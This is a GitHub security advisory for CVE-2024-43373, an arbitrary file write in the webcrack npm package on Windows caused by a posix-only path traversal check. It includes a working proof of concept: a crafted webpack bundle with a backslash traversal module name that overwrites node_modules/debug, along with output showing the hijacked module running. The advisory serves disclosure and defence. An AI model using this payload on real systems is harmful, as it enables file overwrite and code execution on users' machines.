Skip to content

Arbitrary File Write Vulnerability in webcrack on Windows when Parsing and Saving a Malicious Bundle

High
j4k0xb published GHSA-ccqh-278p-xq6w Aug 14, 2024

Package

npm webcrack (npm)

Affected versions

<= 2.14.0

Patched versions

2.14.1

Description

Summary

An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.

Details

Source: packages/webcrack/src/unpack/bundle.ts#L79

import { posix } from 'node:path';
import type { Module } from './module';

// eslint-disable-next-line @typescript-eslint/unbound-method
const { dirname, join, normalize } = posix;

/* ... snip ... */

const modulePath = normalize(join(path, module.path));
if (!modulePath.startsWith(path)) {
    throw new Error(`detected path traversal: ${module.path}`);
}
await mkdir(dirname(modulePath), {
    recursive: true
});
await writeFile(modulePath, module.code, 'utf8');

In this code, the application explicitly relies on the POSIX version of path utilities (dirname, join, normalize) from Node.js. However, the vulnerability arises because the POSIX version of the normalize function does not recognize \ as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.

PoC

The following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the debug module in Node.js:

Malicious Script (what.js):

(function (e) {
    var n = {};
    function o(r) {
      if (n[r]) {
        return n[r].exports;
      }
      var a = (n[r] = {
        i: r,
        l: false,
        exports: {},
      });
      e[r].call(a.exports, a, a.exports, o);
      a.l = true;
      return a.exports;
    }
    o.p = '';
    o((o.s = 386));
  })({
    './\\..\\node_modules\\debug\\src\\index': function (e, t, n) {
        module.exports = () => console.log("pwned")
    },
  });

Webcrack Script (index.js):

import fs from 'fs';
import { webcrack } from 'webcrack';

const input = fs.readFileSync('what.js', 'utf8');

const result = await webcrack(input);
console.log(result.code);
console.log(result.bundle);
await result.save('output-dir');

Execution:
Running the above script with node index.js twice results in the following output being printed to the terminal:

PS C:\Webcrack> node .\index.js
Debugger attached.
(function (e) {
  var n = {};
  function o(r) {
    if (n[r]) {
      return n[r].exports;
    }
    var a = n[r] = {
      i: r,
      l: false,
      exports: {}
    };
    e[r].call(a.exports, a, a.exports, o);
    a.l = true;
    return a.exports;
  }
  o.p = "";
  o(o.s = 386);
})({
  "./\\..\\node_modules\\debug\\src\\index": function (e, t, n) {
    module.exports = () => console.log("pwned");
  }
});
WebpackBundle {
  type: 'webpack',
  entryId: '386',
  modules: Map(1) {
    './\\..\\node_modules\\debug\\src\\index' => WebpackModule {
      id: './\\..\\node_modules\\debug\\src\\index',
      isEntry: false,
      path: '././\\..\\node_modules\\debug\\src\\index.js',
      ast: [Object]
    }
  }
}
Waiting for the debugger to disconnect...
PS C:\Webcrack> node .\index.js
Debugger attached.
pwned
pwned
pwned
pwned
pwned
pwned
pwned
Waiting for the debugger to disconnect...
file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444
  if (options.log) logger(`${name}: started`);
                   ^

TypeError: logger is not a function
    at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20)
    at Array.<anonymous> (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7)
    at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20)
    at async file:///C:/Webcrack/index.js:6:16

Node.js v18.16.0

This demonstrates that the debug module was successfully overwritten and hijacked to print pwned to the console, confirming the arbitrary file write vulnerability has lead to code execution.

Impact

This vulnerability allows an attacker to write arbitrary .js files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

CVE ID

CVE-2024-43373

Credits